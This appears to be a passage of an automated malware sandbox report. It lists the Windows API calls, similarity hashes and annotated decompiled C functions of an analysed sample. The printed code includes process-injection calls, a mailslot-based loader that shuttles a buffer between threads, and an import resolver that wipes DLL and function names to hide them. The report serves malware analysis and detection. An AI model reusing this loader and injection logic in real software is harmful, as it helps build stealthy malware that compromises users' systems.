    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed; "pnls" stored as a little-endian DWORD (the String ID listed above)
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed; first worker: the mailslot reader at 0x401034 (cf. E00401033 below)
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed; second worker: the mailslot writer E004010FB below
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed; wait for the writer thread to finish
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4); // writer failed: kill the reader thread
						} else {
							WaitForSingleObject(_v8, 0xffffffff); // writer succeeded: wait for the reader
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed; both threads succeeded: process the received buffer (VirtualAlloc in the subcall, see APIs)
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0; // bytes written so far
				do {
					// open the mailslot for writing (0x40000000 = GENERIC_WRITE)
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2); // 2 = ERROR_FILE_NOT_FOUND: retry until the reader thread has created the mailslot
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed; prepares the buffer to send (pointer returned in _a4, length in _v24)
				if(_t34 == 0) {
					_v12 = 0xb; // 0xb = ERROR_BAD_FORMAT
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000; // send at most one 0x1000-byte chunk per iteration
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) { // 0x79 = ERROR_SEM_TIMEOUT is retried; any other error aborts the transfer
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							// the final chunk was a full 0x1000 bytes: resend its last byte as a
							// 1-byte message so the reader, which stops on a short read, terminates
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8); // wipe the sent buffer before freeing it (E00401207 -> HeapFree, see APIs)
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000; // result: 0 on success, Win32 error code otherwise
				_t33 =  *((intOrPtr*)(_a4 + 0x80)); // IMAGE_NT_HEADERS32 + 0x80: import directory RVA (DataDirectory[1])
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi; // __edi = image base; _t34 -> first IMAGE_IMPORT_DESCRIPTOR
				_t23 =  *((intOrPtr*)(_t34 + 0xc)); // descriptor->Name (RVA of the DLL name)
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44)); // erase the DLL name from the image once it has been used
					_t27 =  *_t34; // descriptor->OriginalFirstThunk (import name table)
					_t35 =  *((intOrPtr*)(_t34 + 0x10)); // descriptor->FirstThunk (IAT slots to fill)
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); // Name of the next descriptor (0x14 + 0xc)
							_t34 = _t34 + 0x14; // sizeof(IMAGE_IMPORT_DESCRIPTOR)
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42; // distance from a name-table entry to its IAT slot
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							// high bit (IMAGE_ORDINAL_FLAG32) set: value must lie inside the image (+0x50 = SizeOfImage)
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42; // import by name: RVA of an IMAGE_IMPORT_BY_NAME
						}
						_t11 = _t28 + 2; // 0x2: skip the Hint field to reach the function name
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49)); // erase the function name after resolving it
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4; // write the resolved address into the IAT slot
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f; // 0x7f = ERROR_PROC_NOT_FOUND
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e; // 0x7e = ERROR_MOD_NOT_FOUND
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0; // total bytes received
				_v12 = 0x1000; // current buffer size, grown by 0x1000 after each full read
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v20 = _t24; // mailslot handle, used by ReadFile and CloseHandle below
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed; read one 0x1000-byte message
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) { // 0x79 = ERROR_SEM_TIMEOUT: treat as a full read and keep polling
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed; grow the buffer for the next message
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000); // the first short message ends the transfer
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36; // hand the received buffer ...
					 *((intOrPtr*)(_t27 + 8)) = _t39; // ... and its length back to the caller
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
